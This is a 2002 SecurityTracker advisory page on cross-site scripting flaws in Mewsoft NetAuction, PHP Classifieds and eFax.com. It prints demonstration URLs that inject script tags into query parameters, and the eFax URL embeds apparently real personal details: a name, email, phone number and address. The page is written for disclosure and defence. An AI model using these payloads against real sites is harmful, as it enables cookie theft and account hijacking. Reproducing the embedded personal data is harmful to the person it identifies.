SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   NetAuction Vendors:   Mewsoft Corporation
Mewsoft NetAuction Allows Cross-site Scripting Attacks Against NetAuction Users
SecurityTracker Alert ID:  1004547
SecurityTracker URL:  http://securitytracker.com/id/1004547
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0
Description:   A vulnerability was reported in Mewsoft's NetAuction script. A remote user can chreate an HTML link that, when loaded by a target user, will cause arbitrary scripting code to be executed on the target user's browser.

The following is a demonstration exploit URL:
http://[host]/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&Where=&Sort=Photo&Dir=

A remote user can supply this URL to a target (victim) user. When loaded by the target user, the scripting code supplied by the remote user will be executed by the target user's browser. The scripting will appear to originate from the site running NetAuction and will run in the security context of that site. As a result, the code will be able to access the target user's cookies associated with that site (if any) and may be able to take actions on the site acting as the user.

Impact:   A remote user may be able to cause arbitrary scripting code to be executed on a NetAuction user's computer. The code may be able to steal the target user's cookies associated with the NetAuction site or take actions on the NetAuction site acting as the user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mewsoft.com/Products/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Mewsoft Auction, PHP Classifieds and eFax.com - CrossSiteScripting issues


Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and
eFax.com
Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com
(ASP)
Date: 14.6.2002
Impact: remote user can execute shell commands & cross site scripting

=====================================


CrossSiteScripting @ Mewsoft Auction Script
<example>
http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search
&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script
>&Where=&Sort=Photo&Dir=
</example>

Program Name    : Mewsoft Auction
Program Version : 3.0
Home Page         : http://www.mewsoft.com


=====================================

CrossSiteScripting @ PHP Classifieds
<example>
http://www.xxxx.com/phpclassifieds/latestwap.php?url=<script>alert('OopS');<
/script>
</example>

Program Name    : PHP Classifieds
Program Version : 6.05
Home Page         : http://www.deltascripts.com/phpclassifieds


=====================================

https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=al
i&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralco
de=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=53
02723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&Credit
CardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Ced
ar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Coun
try=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&
agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&L
atCities=NONE&CCNumberError=<script>alert('OopS');</script>

eFax web site have many CSS, thats was just one example..


Solution: DON'T trust the user, filter every thing ex in PHP:
<?
$input = HTMLSpecialChars($input);
echo "<hr>your input was:<b>$input</b>";
?>

for your Information: CSS can be used SOMETIMES to execute shell commands on
the web server (using SSI, depending on the WebServer Configuretion) , not
only cookies hijack...


http://127.0.0.1/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC